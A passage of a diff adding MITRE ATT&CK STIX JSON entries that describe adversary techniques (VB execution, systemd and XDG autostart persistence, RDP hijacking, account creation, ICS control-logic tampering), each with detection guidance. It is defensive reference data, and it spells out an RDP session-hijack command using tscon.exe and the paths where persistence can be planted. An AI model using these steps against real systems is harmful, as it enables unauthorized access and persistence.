"2020-03-15T16:13:46.151Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1071/001", + "external_id": "T1071.001" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Brazking-Websockets", + "description": "Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.", + "url": "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Visual Basic", + "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "created": "2020-03-09T14:29:51.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/005", + "external_id": "T1059.005" + }, + { + "source_name": "VB .NET Mar 2020", + "description": ".NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020.", + "url": "https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/" + }, + { + "source_name": "Default VBS macros Blocking ", + "description": "Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.", + "url": "https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805" + }, + { + "source_name": "Microsoft VBScript", + "description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.", + "url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)" + }, + { + "source_name": "Microsoft VBA", + "description": "Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.", + "url": "https://docs.microsoft.com/office/vba/api/overview/" + }, + { + "source_name": "VB Microsoft", + "description": "Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.", + "url": "https://docs.microsoft.com/dotnet/visual-basic/" + }, + { + "source_name": "Wikipedia VBA", + "description": "Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.", + "url": "https://en.wikipedia.org/wiki/Visual_Basic_for_Applications" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Hidden File System", + "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "created": "2020-06-28T22:55:55.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/005", + "external_id": "T1564.005" + }, + { + "source_name": "MalwareTech VFS Nov 2014", + "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.", + "url": "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html" + }, + { + "source_name": "FireEye Bootkits", + "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html" + }, + { + "source_name": "ESET ComRAT May 2020", + "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf" + }, + { + "source_name": "Kaspersky Equation QA", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-15T14:19:22.282Z", + "name": "Systemd Service", + "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) \n\nInside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service) \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.\n* `ExecReload` directive executes when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. \n\nAdversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) \n\nThe .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tony Lambert, Red Canary", + "Emad Al-Mousa, Saudi Aramco", + "Tim (Wadhwa-)Brown" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file creation and modification events of Systemd service unit configuration files in the default directory locations for `root` & `user` level permissions. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the `root` user.(Citation: lambert systemd 2022) \n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: `systemctl list-units -–type=service –all`. Analyze the contents of `.service` files present on the file system and ensure that they refer to legitimate, expected executables, and symbolic links.(Citation: Berba hunting linux systemd)\n\nAuditing the execution and command-line arguments of the `systemctl` utility, as well related utilities such as `/usr/sbin/service` may reveal malicious systemd service execution.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "created": "2020-01-17T16:15:19.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1543/002", + "external_id": "T1543.002" + }, + { + "source_name": "airwalk backdoor unix systems", + "description": "airwalk. (2023, January 1). A guide to backdooring Unix systems. Retrieved May 31, 2023.", + "url": "http://www.ouah.org/backdoors.html" + }, + { + "source_name": "Anomali Rocke March 2019", + "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.", + "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" + }, + { + "source_name": "freedesktop systemd.service", + "description": "Free Desktop. (n.d.). systemd.service — Service unit configuration. Retrieved March 20, 2023.", + "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html" + }, + { + "source_name": "Linux man-pages: systemd January 2014", + "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.", + "url": "http://man7.org/linux/man-pages/man1/systemd.1.html" + }, + { + "source_name": "Berba hunting linux systemd", + "description": "Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.", + "url": "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + }, + { + "source_name": "Rapid7 Service Persistence 22JUNE2016", + "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.", + "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence" + }, + { + "source_name": "lambert systemd 2022", + "description": "Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.", + "url": "https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T15:37:02.771Z", + "name": "RDP Hijacking", + "description": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", + "created": "2020-02-25T18:35:42.765Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1563/002", + "external_id": "T1563.002" + }, + { + "source_name": "RDP Hijacking Medium", + "description": "Beaumont, K. (2017, March 19). RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.", + "url": "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" + }, + { + "source_name": "RDP Hijacking Korznikov", + "description": "Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.", + "url": "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html" + }, + { + "source_name": "TechNet Remote Desktop Services", + "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", + "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx" + }, + { + "source_name": "Kali Redsnarf", + "description": "NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.", + "url": "https://github.com/nccgroup/redsnarf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-31T20:46:43.215Z", + "name": "Create Account", + "description": "Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Microsoft Threat Intelligence Center (MSTIC)", + "Praetorian", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Network", + "Containers", + "SaaS" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1136", + "external_id": "T1136" + }, + { + "source_name": "Microsoft User Creation Event", + "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720" + }, + { + "source_name": "Symantec WastedLocker June 2020", + "description": "Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-16T16:35:12.501Z", + "name": "XDG Autostart Entries", + "description": "Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)\n\nAdversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.\n\nAdversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tony Lambert, Red Canary" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Malicious XDG autostart entries may be detected by auditing file creation and modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.\n \nSuspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", + "created": "2019-09-10T18:13:12.195Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/013", + "external_id": "T1547.013" + }, + { + "source_name": "Free Desktop Application Autostart Feb 2006", + "description": "Free Desktop. (2006, February 13). Desktop Application Autostart Specification. Retrieved September 12, 2019.", + "url": "https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html" + }, + { + "source_name": "Free Desktop Entry Keys", + "description": "Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved September 12, 2019.", + "url": "https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html" + }, + { + "source_name": "Red Canary Netwire Linux 2022", + "description": "TONY LAMBERT. (2022, June 7). Trapping the Netwire RAT on Linux. Retrieved September 28, 2023.", + "url": "https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:11.924Z", + "name": "Standard Application Layer Protocol", + "description": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0869", + "external_id": "T0869" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Modify Control Logic", + "description": "Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. \n\nProgram code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active.\n\nAn adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools.\n\nAn adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. \n\nIt is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the “real” pressure is for given analog signals and then automatically linearize the measurement to what would be the “real” pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be “corrected” during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. (Citation: Stuxnet - Langner - 201311)\n\nIn the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0833", + "external_id": "T0833" + }, + { + "source_name": "Stuxnet - Langner - 201311", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + }, + { + "source_name": "Maroochy - MITRE - 200808", + "description": "Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.", + "url": "https://www.mitre.org/sites/default/files/pdf/08%201145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-31T20:05:44.075Z", + "name": "Server", + "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Dor Edry, Microsoft" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", + "created": "2020-10-01T00:56:25.135Z", + 